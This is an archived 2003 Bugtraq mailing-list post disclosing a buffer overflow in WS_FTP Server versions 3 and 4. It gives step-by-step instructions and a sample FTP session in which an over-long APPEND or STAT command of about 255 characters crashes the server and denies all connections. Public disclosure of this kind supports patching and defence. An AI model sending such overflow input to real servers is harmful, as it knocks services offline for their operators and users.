Home page logo
/

bugtraq logo Bugtraq mailing list archives

Remote and Local Vulnerabilities In WS_FTP Server
From: pejman d <pejman () rite ca>
Date: 6 Sep 2003 04:48:27 -0000



hi dear
i am pejman.d ,i finded the new bug in ws_ftp server 
 
Vulnerable Systems : ws_ftp server  4,3
the bug is buffer overflow in ftp command service stop and some error

step by step buffer overflow :
1- login to ftp server by any username and password
2- use the quote command for send the command  to server 
3- you can use  status or append or some command 
4- after command 250 character for overflow : status 255x[A] or
append 255x[A]and other command
 

quote
Command line to send 
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
 
SAMPLE :
 
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Connection closed by remote host.
ftp>
 
 
ftp server is stop and all connection is refused !!!
it's work at ver 3,4  and test on the windows 2000 advance and prof  with  
sp4 
 
i u need the additional information send mail to pejman () rite ca
 
pejman.d (deject hacker )


  By Date           By Thread  

Current thread:
  • Remote and Local Vulnerabilities In WS_FTP Server pejman d (Sep 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault